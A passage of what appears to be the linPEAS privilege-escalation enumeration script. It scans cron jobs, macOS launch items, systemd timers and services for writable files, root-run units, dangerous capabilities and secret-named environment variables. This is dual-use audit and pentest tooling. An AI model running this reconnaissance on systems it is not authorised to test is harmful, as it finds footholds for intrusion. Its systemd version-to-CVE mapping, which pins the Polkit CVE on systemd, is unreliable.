# Attack: Using unquoted variables or command substitution that can be injected 6582 # Example: echo $VAR or echo $(command) 6583 if echo "$cmd" | grep -qE '\$\{?[A-Za-z0-9_]|\$\(|`'; then 6584 findings="${findings}COMMAND_INJECTION: Command uses unquoted variables or command substitution\n" 6585 fi 6586 # Check for overly permissive commands 6587 # Attack: Commands that can be used to escalate privileges 6588 # Example: chmod 777, chown root, etc. 6589 if echo "$cmd" | grep -qE '\b(chmod\s+[0-7]{3,4}|chown\s+root|chgrp\s+root|sudo|su |pkexec)\b'; then 6590 findings="${findings}PERMISSIVE_COMMAND: Command modifies permissions or uses privilege escalation tools\n" 6591 fi 6592 # If any findings, print them 6593 if [ -n "$findings" ]; then 6594 echo "Potential privilege escalation in cron job:" 6595 echo " └─ File: $file" 6596 echo " └─ Command: $cmd" 6597 if [ -n "$bin" ]; then 6598 echo " └─ Binary: $bin" 6599 fi 6600 echo " └─ Findings:" 6601 echo "$findings" | while read -r finding; do 6602 [ -n "$finding" ] && echo " * $finding" 6603 done 6604 fi 6605 } 6606 # Check system crontabs 6607 #echo "Checking system crontabs..." 6608 #for crontab in /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/* /var/spool/cron/crontabs/* /etc/at* /etc/anacrontab /etc/incron.d/* /var/spool/incron/*; do 6609 # [ ! -f "$crontab" ] && continue 6610 # [ ! -r "$crontab" ] && continue 6611 # # Check if the file is writable 6612 # if [ -w "$crontab" ]; then 6613 # echo "Writable cron file: $crontab" 6614 # fi 6615 # # Check each line for privilege escalation vectors 6616 # while IFS= read -r line || [ -n "$line" ]; do 6617 # # Skip comments and empty lines 6618 # case "$line" in 6619 # \#*|"") continue ;; 6620 # esac 6621 # # Extract the command part (everything after the time specification) 6622 # cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //') 6623 # [ -z "$cmd" ] && continue 6624 # check_privesc_vectors "$cmd" "$crontab" 6625 # done < "$crontab" 6626 #done 6627 # Check user crontabs 6628 #echo "Checking user crontabs..." 6629 #if command -v crontab >/dev/null 2>&1; then 6630 # # Check current user's crontab 6631 # crontab -l 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do 6632 # case "$line" in 6633 # \#*|"") continue ;; 6634 # esac 6635 # cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //') 6636 # [ -z "$cmd" ] && continue 6637 # check_privesc_vectors "$cmd" "current user crontab" 6638 # done 6639 # # Check other users' crontabs if accessible 6640 # for user_crontab in /var/spool/cron/crontabs/*; do 6641 # [ ! -f "$user_crontab" ] && continue 6642 # [ ! -r "$user_crontab" ] && continue 6643 # username=$(basename "$user_crontab") 6644 # [ "$username" = "$USER" ] && continue 6645 # echo "Found crontab for user: $username" 6646 # while IFS= read -r line || [ -n "$line" ]; do 6647 # case "$line" in 6648 # \#*|"") continue ;; 6649 # esac 6650 # cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //') 6651 # [ -z "$cmd" ] && continue 6652 # check_privesc_vectors "$cmd" "$user_crontab" 6653 # done < "$user_crontab" 6654 # done 6655 #else 6656 # echo_not_found "crontab" 6657 #fi 6658 # Check for writable cron directories 6659 echo "Checking cron directories..." 6660 for cron_dir in /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly /var/spool/cron/crontabs /usr/lib/cron/tabs /private/var/at/jobs /var/at/tabs /etc/periodic; do 6661 [ ! -d "$cron_dir" ] && continue 6662 if [ -w "$cron_dir" ]; then 6663 echo "Writable cron directory: $cron_dir" 6664 fi 6665 done 6666 if command -v run-parts >/dev/null 2>&1; then 6667 print_3title "run-parts executable entries" "T1053.003" 6668 for cron_dir in /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly; do 6669 [ -d "$cron_dir" ] || continue 6670 echo "[$cron_dir]" 6671 run-parts --test "$cron_dir" 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" 6672 done 6673 echo "" 6674 fi 6675 # Check for at jobs 6676 #if command -v atq >/dev/null 2>&1; then 6677 # echo "Checking at jobs..." 6678 # atq 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do 6679 # [ -z "$line" ] && continue 6680 # job_id=$(echo "$line" | awk '{print $1}') 6681 # [ -z "$job_id" ] && continue 6682 # at -c "$job_id" 2>/dev/null | while IFS= read -r cmd || [ -n "$cmd" ]; do 6683 # case "$cmd" in 6684 # \#*|"") continue ;; 6685 # esac 6686 # check_privesc_vectors "$cmd" "at job $job_id" 6687 # done 6688 # done 6689 #fi 6690 # Check for incron jobs 6691 #if command -v incrontab >/dev/null 2>&1; then 6692 # echo "Checking incron jobs..." 6693 # incrontab -l 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do 6694 # case "$line" in 6695 # \#*|"") continue ;; 6696 # esac 6697 # cmd=$(echo "$line" | awk '{print $3}') 6698 # [ -z "$cmd" ] && continue 6699 # check_privesc_vectors "$cmd" "incron job" 6700 # done 6701 #fi 6702 else 6703 print_2title "Cron jobs" "T1053.003" 6704 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs" 6705 find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \; 6706 fi 6707 echo "" 6708 6709 fi 6710 6711 if check_mitre_filter "T1543.001"; then 6712 if ! [ "$SEARCH_IN_FOLDER" ]; then 6713 if [ "$MACPEAS" ]; then 6714 print_2title "Third party LaunchAgents & LaunchDemons" "T1543.001" 6715 print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#launchd" 6716 print_info "Checking for privilege escalation vectors in LaunchAgents & LaunchDaemons:" 6717 print_info "1. Writable plist files" 6718 print_info "2. Writable program binaries" 6719 print_info "3. Environment variables with sensitive data" 6720 print_info "4. Unsafe program arguments" 6721 print_info "5. RunAtLoad with elevated privileges" 6722 print_info "6. KeepAlive with elevated privileges" 6723 # Function to check plist content for privilege escalation vectors 6724 check_plist_content() { 6725 local plist="$1" 6726 local findings="" 6727 # Check for environment variables 6728 if defaults read "$plist" EnvironmentVariables 2>/dev/null | grep -qE '(PASS|SECRET|KEY|TOKEN|CRED)'; then 6729 findings="${findings}ENV_VARS: Contains sensitive environment variables\n" 6730 fi 6731 # Check for RunAtLoad with elevated privileges 6732 if defaults read "$plist" RunAtLoad 2>/dev/null | grep -q "true"; then 6733 if [ -w "$plist" ]; then 6734 findings="${findings}RUN_AT_LOAD: Runs at load and plist is writable\n" 6735 fi 6736 fi 6737 # Check for KeepAlive with elevated privileges 6738 if defaults read "$plist" KeepAlive 2>/dev/null | grep -q "true"; then 6739 if [ -w "$plist" ]; then 6740 findings="${findings}KEEP_ALIVE: Keeps running and plist is writable\n" 6741 fi 6742 fi 6743 # Check for unsafe program arguments 6744 if defaults read "$plist" ProgramArguments 2>/dev/null | grep -qE '(sudo|su|chmod|chown|chroot|mount)'; then 6745 findings="${findings}UNSAFE_ARGS: Uses potentially dangerous program arguments\n" 6746 fi 6747 # Check for writable working directory 6748 if defaults read "$plist" WorkingDirectory 2>/dev/null | grep -qE '^/'; then 6749 local workdir=$(defaults read "$plist" WorkingDirectory 2>/dev/null) 6750 if [ -w "$workdir" ]; then 6751 findings="${findings}WRITABLE_WORKDIR: Working directory is writable\n" 6752 fi 6753 fi 6754 # If any findings, print them 6755 if [ -n "$findings" ]; then 6756 echo "Potential privilege escalation in: $plist" 6757 echo "$findings" | while read -r finding; do 6758 [ -n "$finding" ] && echo " └─ $finding" 6759 done 6760 fi 6761 } 6762 # Check system and user LaunchAgents & LaunchDaemons 6763 for plist_dir in /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/; do 6764 [ ! -d "$plist_dir" ] && continue 6765 echo "Checking $plist_dir..." 6766 find "$plist_dir" -name "*.plist" 2>/dev/null | while read -r plist; do 6767 # Check if plist is writable 6768 if [ -w "$plist" ]; then 6769 echo "Writable plist: $plist" | sed -${E} "s,.*,${SED_RED_YELLOW}," 6770 fi 6771 # Get program path 6772 program="" 6773 program=$(defaults read "$plist" Program 2>/dev/null) 6774 if ! [ "$program" ]; then 6775 program=$(defaults read "$plist" ProgramArguments 2>/dev/null | grep -Ev "^\(|^\)" | cut -d '"' -f 2) 6776 fi 6777 # Check if program is writable 6778 if [ -n "$program" ] && [ -w "$program" ]; then 6779 echo "Writable program: $program" | sed -${E} "s,.*,${SED_RED_YELLOW}," 6780 ls -l "$program" 2>/dev/null 6781 fi 6782 # Check plist content for privilege escalation vectors 6783 check_plist_content "$plist" 6784 done 6785 done 6786 echo "" 6787 print_2title "StartupItems" "T1543.001" 6788 print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items" 6789 for startup_dir in /Library/StartupItems/ /System/Library/StartupItems/; do 6790 [ ! -d "$startup_dir" ] && continue 6791 echo "Checking $startup_dir..." 6792 find "$startup_dir" -type f -executable 2>/dev/null | while read -r startup_item; do 6793 if [ -w "$startup_item" ]; then 6794 echo "Writable startup item: $startup_item" | sed -${E} "s,.*,${SED_RED_YELLOW}," 6795 ls -l "$startup_item" 2>/dev/null 6796 fi 6797 done 6798 done 6799 echo "" 6800 print_2title "Login Items" "T1543.001" 6801 print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items" 6802 osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null | tr ", " "\n" | while read -r login_item; do 6803 if [ -n "$login_item" ]; then 6804 # Try to find the actual binary 6805 binary_path=$(mdfind "kMDItemDisplayName == '$login_item'" 2>/dev/null | head -n 1) 6806 if [ -n "$binary_path" ] && [ -w "$binary_path" ]; then 6807 echo "Writable login item binary: $binary_path" | sed -${E} "s,.*,${SED_RED_YELLOW}," 6808 ls -l "$binary_path" 2>/dev/null 6809 fi 6810 fi 6811 done 6812 echo "" 6813 print_2title "SPStartupItemDataType" "T1543.001" 6814 system_profiler SPStartupItemDataType 2>/dev/null | while read -r line; do 6815 if echo "$line" | grep -q "Location:"; then 6816 location=$(echo "$line" | cut -d: -f2- | xargs) 6817 if [ -w "$location" ]; then 6818 echo "Writable startup item location: $location" | sed -${E} "s,.*,${SED_RED_YELLOW}," 6819 ls -l "$location" 2>/dev/null 6820 fi 6821 fi 6822 done 6823 echo "" 6824 print_2title "Emond scripts" "T1543.001" 6825 print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#emond" 6826 if [ -d "/private/var/db/emondClients" ]; then 6827 find "/private/var/db/emondClients" -type f 2>/dev/null | while read -r emond_script; do 6828 if [ -w "$emond_script" ]; then 6829 echo "Writable emond script: $emond_script" | sed -${E} "s,.*,${SED_RED_YELLOW}," 6830 ls -l "$emond_script" 2>/dev/null 6831 fi 6832 done 6833 fi 6834 echo "" 6835 print_2title "Periodic tasks" "T1543.001" 6836 print_info "Checking periodic tasks for privilege escalation vectors" 6837 for periodic_dir in /etc/periodic/daily /etc/periodic/weekly /etc/periodic/monthly; do 6838 [ ! -d "$periodic_dir" ] && continue 6839 echo "Checking $periodic_dir..." 6840 find "$periodic_dir" -type f -executable 2>/dev/null | while read -r periodic_script; do 6841 if [ -w "$periodic_script" ]; then 6842 echo "Writable periodic script: $periodic_script" | sed -${E} "s,.*,${SED_RED_YELLOW}," 6843 ls -l "$periodic_script" 2>/dev/null 6844 fi 6845 done 6846 done 6847 echo "" 6848 fi 6849 fi 6850 6851 fi 6852 6853 if check_mitre_filter "T1053.003"; then 6854 if ! [ "$SEARCH_IN_FOLDER" ]; then 6855 print_2title "System timers" "T1053.003" 6856 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers" 6857 # Function to check timer content for privilege escalation vectors 6858 check_timer_content() { 6859 local timer="$1" 6860 local findings="" 6861 # Get the service unit this timer activates 6862 local service_unit=$(systemctl show "$timer" -p Unit 2>/dev/null | cut -d= -f2) 6863 if [ -n "$service_unit" ]; then 6864 # Check if the service runs with elevated privileges 6865 if systemctl show "$service_unit" -p User 2>/dev/null | grep -q "root"; then 6866 findings="${findings}RUNS_AS_ROOT: Service runs as root\n" 6867 fi 6868 # Get the executable path 6869 local exec_path=$(systemctl show "$service_unit" -p ExecStart 2>/dev/null | cut -d= -f2 | cut -d' ' -f1) 6870 if [ -n "$exec_path" ]; then 6871 if [ -w "$exec_path" ]; then 6872 findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n" 6873 fi 6874 # Check for relative paths 6875 case "$exec_path" in 6876 /*) : ;; # Absolute path, do nothing 6877 *) findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" ;; 6878 esac 6879 fi 6880 # Check for unsafe configurations 6881 if systemctl show "$service_unit" -p ExecStart 2>/dev/null | grep -qE '(chmod|chown|mount|sudo|su)'; then 6882 findings="${findings}UNSAFE_CMD: Uses potentially dangerous commands\n" 6883 fi 6884 # Check for weak permissions 6885 if [ -e "$exec_path" ] && [ "$(stat -c %a "$exec_path" 2>/dev/null)" = "777" ]; then 6886 findings="${findings}WEAK_PERMS: Executable has 777 permissions\n" 6887 fi 6888 fi 6889 # If any findings, print them 6890 if [ -n "$findings" ]; then 6891 echo "Potential privilege escalation in timer: $timer" 6892 echo "$findings" | while read -r finding; do 6893 [ -n "$finding" ] && echo " └─ $finding" 6894 done 6895 fi 6896 } 6897 # Function to check timer file for privilege escalation vectors 6898 check_timer_file() { 6899 local timer_file="$1" 6900 local findings="" 6901 # Check if timer file is writable (following symlinks) 6902 if [ -L "$timer_file" ]; then 6903 # If it's a symlink, check the target file 6904 local target_file=$(readlink -f "$timer_file") 6905 if [ -w "$target_file" ]; then 6906 findings="${findings}WRITABLE_FILE: Timer target file is writable: $target_file\n" 6907 fi 6908 elif [ -w "$timer_file" ]; then 6909 findings="${findings}WRITABLE_FILE: Timer file is writable\n" 6910 fi 6911 # Check for weak permissions (following symlinks) 6912 if [ "$(stat -L -c %a "$timer_file" 2>/dev/null)" = "777" ]; then 6913 findings="${findings}WEAK_PERMS: Timer file has 777 permissions\n" 6914 fi 6915 # Check for relative paths in Unit directive 6916 if grep -q "^Unit=[^/]" "$timer_file" 2>/dev/null; then 6917 findings="${findings}RELATIVE_PATH: Uses relative path in Unit directive\n" 6918 fi 6919 # Check for writable executables in Unit directive (following symlinks) 6920 local unit_path=$(grep -Po '^Unit=*(.*?$)' "$timer_file" 2>/dev/null | cut -d '=' -f2) 6921 if [ -n "$unit_path" ]; then 6922 if [ -L "$unit_path" ]; then 6923 local target_unit=$(readlink -f "$unit_path") 6924 if [ -w "$target_unit" ]; then 6925 findings="${findings}WRITABLE_UNIT: Unit target file is writable: $target_unit\n" 6926 fi 6927 elif [ -w "$unit_path" ]; then 6928 findings="${findings}WRITABLE_UNIT: Unit file is writable: $unit_path\n" 6929 fi 6930 fi 6931 # If any findings, print them 6932 if [ -n "$findings" ]; then 6933 echo "Potential privilege escalation in timer file: $timer_file" 6934 echo "$findings" | while read -r finding; do 6935 [ -n "$finding" ] && echo " └─ $finding" 6936 done 6937 fi 6938 } 6939 # List all timers and check for privilege escalation vectors 6940 print_3title "Active timers:" "T1053.003" 6941 systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | while read -r line; do 6942 # Extract timer unit name 6943 timer_unit=$(echo "$line" | awk '{print $1}') 6944 if [ -n "$timer_unit" ]; then 6945 # Check if timer file is writable 6946 timer_path=$(systemctl show "$timer_unit" -p FragmentPath 2>/dev/null | cut -d= -f2) 6947 if [ -n "$timer_path" ]; then 6948 check_timer_file "$timer_path" 6949 fi 6950 # Check timer content for privilege escalation vectors 6951 check_timer_content "$timer_unit" 6952 # Print the timer line with highlighting 6953 echo "$line" | sed -${E} "s,$timersG,${SED_GREEN}," 6954 fi 6955 done || echo_not_found 6956 # Check for disabled but available timers 6957 print_3title "Disabled timers:" "T1053.003" 6958 systemctl list-unit-files --type=timer --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do 6959 timer_unit=$(echo "$line" | awk '{print $1}') 6960 if [ -n "$timer_unit" ]; then 6961 timer_path=$(systemctl show "$timer_unit" -p FragmentPath 2>/dev/null | cut -d= -f2) 6962 if [ -n "$timer_path" ]; then 6963 check_timer_file "$timer_path" 6964 fi 6965 fi 6966 done || echo_not_found 6967 # Check timer files from PSTORAGE_TIMER 6968 if [ -n "$PSTORAGE_TIMER" ]; then 6969 print_3title "Additional timer files:" "T1053.003" 6970 printf "%s\n" "$PSTORAGE_TIMER" | while read -r timer_file; do 6971 if [ -n "$timer_file" ] && [ -e "$timer_file" ]; then 6972 check_timer_file "$timer_file" 6973 fi 6974 done 6975 fi 6976 echo "" 6977 fi 6978 6979 fi 6980 6981 if check_mitre_filter "T1543.002,T1007"; then 6982 if ! [ "$SEARCH_IN_FOLDER" ]; then 6983 print_2title "Services and Service Files" "T1543.002,T1007" 6984 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services" 6985 # Function to check service content for privilege escalation vectors 6986 check_service_content() { 6987 local service="$1" 6988 local findings="" 6989 # Check if service runs with elevated privileges 6990 if systemctl show "$service" -p User 2>/dev/null | grep -q "root"; then 6991 findings="${findings}RUNS_AS_ROOT: Service runs as root\n" 6992 fi 6993 # Get the executable path and check it 6994 local exec_path=$(systemctl show "$service" -p ExecStart 2>/dev/null | cut -d= -f2 | cut -d' ' -f1) 6995 if [ -n "$exec_path" ]; then 6996 if [ -w "$exec_path" ]; then 6997 findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n" 6998 fi 6999 # Check for relative paths 7000 #case "$exec_path" in 7001 # /*) : ;; # Absolute path, do nothing 7002 # *) findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" ;; 7003 #esac 7004 # Check for weak permissions 7005 if [ -e "$exec_path" ] && [ "$(stat -c %a "$exec_path" 2>/dev/null)" = "777" ]; then 7006 findings="${findings}WEAK_PERMS: Executable has 777 permissions\n" 7007 fi 7008 fi 7009 # Check for unsafe configurations 7010 if systemctl show "$service" -p ExecStart 2>/dev/null | grep -qE '(chmod|chown|mount|sudo|su)'; then 7011 findings="${findings}UNSAFE_CMD: Uses potentially dangerous commands\n" 7012 fi 7013 # Check for environment variables with sensitive data 7014 if systemctl show "$service" -p Environment 2>/dev/null | grep -qE '(PASS|SECRET|KEY|TOKEN|CRED)'; then 7015 findings="${findings}SENSITIVE_ENV: Contains sensitive environment variables\n" 7016 fi 7017 # Check for capabilities 7018 if systemctl show "$service" -p CapabilityBoundingSet 2>/dev/null | grep -qE '(CAP_SYS_ADMIN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH)'; then 7019 findings="${findings}DANGEROUS_CAPS: Has dangerous capabilities\n" 7020 fi 7021 # If any findings, print them 7022 if [ -n "$findings" ]; then 7023 echo " Potential issue in service: $service" 7024 echo "$findings" | while read -r finding; do 7025 [ -n "$finding" ] && echo " └─ $finding" 7026 done 7027 fi 7028 } 7029 # Function to check service file for privilege escalation vectors 7030 check_service_file() { 7031 local service_file="$1" 7032 local findings="" 7033 # Check if service file is writable (following symlinks) 7034 if [ -L "$service_file" ]; then 7035 # If it's a symlink, check the target file 7036 local target_file=$(readlink -f "$service_file") 7037 if ! [ "$IAMROOT" ] && [ -w "$target_file" ] && [ -f "$target_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then 7038 findings="${findings}WRITABLE_FILE: Service target file is writable: $target_file\n" 7039 fi 7040 elif ! [ "$IAMROOT" ] && [ -w "$service_file" ] && [ -f "$service_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then 7041 findings="${findings}WRITABLE_FILE: Service file is writable\n" 7042 fi 7043 # Check for weak permissions (following symlinks) 7044 if [ "$(stat -L -c %a "$service_file" 2>/dev/null)" = "777" ]; then 7045 findings="${findings}WEAK_PERMS: Service file has 777 permissions\n" 7046 fi 7047 # Check for relative paths in Exec directives - Original logic 7048 local relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$service_file" 2>/dev/null | grep -Iv "=/") 7049 local relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$service_file" 2>/dev/null) 7050 if [ "$relpath1" ] || [ "$relpath2" ]; then 7051 if [ "$WRITABLESYSTEMDPATH" ]; then 7052 findings="${findings}RELATIVE_PATH: Could be executing some relative path (systemd path is writable)\n" 7053 else 7054 findings="${findings}RELATIVE_PATH: Could be executing some relative path\n" 7055 fi 7056 fi 7057 # Check for writable executables (following symlinks) 7058 local exec_paths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$service_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') 7059 printf "%s\n" "$exec_paths" | while read -r exec_path; do 7060 if [ -n "$exec_path" ]; then 7061 if [ -L "$exec_path" ]; then 7062 local target_exec=$(readlink -f "$exec_path") 7063 if [ -w "$target_exec" ]; then 7064 findings="${findings}WRITABLE_EXEC: Executable target is writable: $target_exec\n" 7065 fi 7066 elif [ -w "$exec_path" ]; then 7067 findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n" 7068 fi 7069 fi 7070 done 7071 # If any findings, print them 7072 if [ -n "$findings" ]; then 7073 echo " Potential issue in service file: $service_file" 7074 echo "$findings" | while read -r finding; do 7075 [ -n "$finding" ] && echo " └─ $finding" 7076 done 7077 fi 7078 } 7079 # List all services and check for privilege escalation vectors 7080 echo "" 7081 print_3title "Active services:" "T1543.002,T1007" 7082 systemctl list-units --type=service --state=active 2>/dev/null | grep -v "UNIT" | while read -r line; do 7083 service_unit=$(echo "$line" | awk '{print $1}') 7084 if [ -n "$service_unit" ]; then 7085 # Print the service line with highlighting 7086 echo "$line" | sed -${E} "s,$service_unit,${SED_GREEN}," 7087 # Get service file path 7088 service_path=$(systemctl show "$service_unit" -p FragmentPath 2>/dev/null | cut -d= -f2) 7089 if [ -n "$service_path" ]; then 7090 check_service_file "$service_path" 7091 fi 7092 # Check service content for privilege escalation vectors 7093 check_service_content "$service_unit" 7094 fi 7095 done || echo_not_found 7096 # Check for disabled but available services 7097 echo "" 7098 print_3title "Disabled services:" "T1543.002,T1007" 7099 systemctl list-unit-files --type=service --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do 7100 service_unit=$(echo "$line" | awk '{print $1}') 7101 if [ -n "$service_unit" ]; then 7102 # Print the service line with highlighting 7103 echo "$line" | sed -${E} "s,$service_unit,${SED_GREEN}," 7104 # Get service file path 7105 service_path=$(systemctl show "$service_unit" -p FragmentPath 2>/dev/null | cut -d= -f2) 7106 if [ -n "$service_path" ]; then 7107 check_service_file "$service_path" 7108 fi 7109 # Check service content for privilege escalation vectors 7110 check_service_content "$service_unit" 7111 fi 7112 done || echo_not_found 7113 # Check service files from PSTORAGE_SYSTEMD 7114 if [ -n "$PSTORAGE_SYSTEMD" ]; then 7115 echo "" 7116 print_3title "Additional service files:" "T1543.002,T1007" 7117 printf "%s\n" "$PSTORAGE_SYSTEMD" | while read -r service_file; do 7118 if [ -n "$service_file" ] && [ -e "$service_file" ]; then 7119 check_service_file "$service_file" 7120 fi 7121 done 7122 fi 7123 # Check for outdated services if EXTRA_CHECKS is enabled 7124 if [ "$EXTRA_CHECKS" ]; then 7125 echo "" 7126 print_3title "Service versions and status:" "T1543.002,T1007" 7127 if [ "$TIMEOUT" ]; then 7128 $TIMEOUT 30 sh -c "(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null" || echo_not_found "service|chkconfig|rc-status|launchctl" 7129 else 7130 (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" 7131 fi 7132 fi 7133 # Check systemd path writability 7134 if [ ! "$WRITABLESYSTEMDPATH" ]; then 7135 echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN}," 7136 else 7137 echo "You can write on systemd PATH" | sed -${E} "s,.*,${SED_RED}," 7138 echo "If a relative path is used, it's possible to abuse it." 7139 fi 7140 echo "" 7141 fi 7142 7143 fi 7144 7145 if check_mitre_filter "T1543.002"; then 7146 if ! [ "$SEARCH_IN_FOLDER" ]; then 7147 print_2title "Systemd Information" "T1543.002" 7148 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths" 7149 # Function to check if systemctl is available 7150 check_systemctl() { 7151 if ! command -v systemctl >/dev/null 2>&1; then 7152 echo_not_found "systemctl" 7153 return 1 7154 fi 7155 return 0 7156 } 7157 # Function to list running systemd services 7158 list_running_services() { 7159 systemctl list-units --type=service --state=running 2>/dev/null 7160 } 7161 # Function to get service file path 7162 get_service_file() { 7163 local service="$1" 7164 local file="" 7165 for path in "/etc/systemd/system/$service" "/lib/systemd/system/$service"; do 7166 if [ -f "$path" ]; then 7167 file="$path" 7168 break 7169 fi 7170 done 7171 echo "$file" 7172 } 7173 # Function to check dangerous capabilities 7174 check_dangerous_caps() { 7175 local caps="$1" 7176 echo "$caps" | grep -qE '(CAP_SYS_ADMIN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_SETUID|CAP_SETGID|CAP_NET_ADMIN)' 7177 return $? 7178 } 7179 # Check systemd version and known vulnerabilities 7180 print_list "Systemd version and vulnerabilities? .............. "$NC 7181 if check_systemctl; then 7182 version=$(systemctl --version | head -n 1 | grep -oE '([0-9]+(\.[0-9]+)+)') 7183 if [ -n "$version" ]; then 7184 echo "$version" | sed -${E} "s,([0-9]+(\.[0-9]+)+),${SED_RED},g" 7185 # Check for known vulnerable versions 7186 case "$version" in 7187 "2.3"[0-4]|"2.3"[0-4]"."*) 7188 echo " └─ Vulnerable to CVE-2021-4034 (Polkit)" | sed -${E} "s,.*,${SED_RED},g" 7189 ;; 7190 "2.4"[0-9]|"2.4"[0-9]"."*) 7191 echo " └─ Vulnerable to CVE-2021-33910 (systemd-tmpfiles)" | sed -${E} "s,.*,${SED_RED},g" 7192 ;; 7193 esac 7194 fi 7195 fi 7196 # Check for systemd services running as root 7197 print_list "Services running as root? ..... "$NC 7198 if check_systemctl; then 7199 list_running_services | 7200 grep -E "root|0:0" | 7201 while read -r line; do 7202 service=$(echo "$line" | awk '{print $1}') 7203 user=$(systemctl show "$service" -p User 2>/dev/null | cut -d= -f2) 7204 echo "$service (User: $user)" | sed -${E} "s,root|0:0,${SED_RED},g" 7205 done 7206 echo "" 7207 else 7208 echo "" 7209 fi 7210 # Check for systemd services with dangerous capabilities 7211 print_list "Running services with dangerous capabilities? ... "$NC 7212 if check_systemctl; then 7213 list_running_services | 7214 grep -E "\.service" | 7215 while read -r line; do 7216 service=$(echo "$line" | awk '{print $1}') 7217 caps=$(systemctl show "$service" -p CapabilityBoundingSet 2>/dev/null | cut -d= -f2) 7218 if [ -n "$caps" ] && check_dangerous_caps "$caps"; then 7219 echo "$service: $caps" | sed -${E} "s,.*,${SED_RED},g" 7220 fi 7221 done 7222 echo "" 7223 else 7224 echo "" 7225 fi 7226 # Check for systemd services with writable paths 7227 print_list "Services with writable paths? . "$NC 7228 if check_systemctl; then 7229 list_running_services | 7230 grep -E "\.service" | 7231 while read -r line; do 7232 service=$(echo "$line" | awk '{print $1}') 7233 service_file=$(get_service_file "$service") 7234 if [ -n "$service_file" ]; then 7235 # Check service-specific PATH entries (Environment=PATH=...) 7236 svc_writable_path=$(grep -E '^Environment=.*PATH=' "$service_file" 2>/dev/null | sed -E 's/^Environment=//; s/^"//; s/"$//; s/^PATH=//' | tr ':' '\n' | while read -r svc_path_entry; do 7237 [ -z "$svc_path_entry" ] && continue 7238 if [ -d "$svc_path_entry" ] && [ -w "$svc_path_entry" ]; then 7239 echo "$svc_path_entry" 7240 fi 7241 done) 7242 if [ "$svc_writable_path" ]; then 7243 for svc_path_entry in $svc_writable_path; do 7244 echo "$service: Writable service PATH entry '$svc_path_entry'" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 7245 done 7246 fi 7247 # Check ExecStart paths 7248 grep -E "ExecStart|ExecStartPre|ExecStartPost" "$service_file" 2>/dev/null | 7249 while read -r exec_line; do 7250 # Extract command from the right side of Exec*=, not from argv 7251 exec_value="${exec_line#*=}" 7252 exec_value=$(echo "$exec_value" | sed 's/^[[:space:]]*//') 7253 cmd=$(echo "$exec_value" | awk '{print $1}' | tr -d '"') 7254 # Strip systemd command prefixes (-, @, :, +, !) before path checks 7255 cmd_path=$(echo "$cmd" | sed -E 's/^[-@:+!]+//') 7256 # Only check the command path, not arguments 7257 if [ -n "$cmd_path" ] && [ -w "$cmd_path" ]; then 7258 echo "$service: $cmd_path (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g" 7259 fi 7260 # Check for relative paths only in the command, not arguments 7261 if [ -n "$cmd_path" ] && [ "${cmd_path#/}" = "$cmd_path" ] && [ "${cmd_path#\$}" = "$cmd_path" ]; then 7262 echo "$service: Uses relative path '$cmd_path' (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g" 7263 if [ "$svc_writable_path" ]; then 7264 echo "$service: Relative Exec path + writable service PATH can allow path hijacking" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 7265 fi 7266 fi 7267 done 7268 fi 7269 done 7270 else 7271 echo "" 7272 fi 7273 echo "" 7274 print_2title 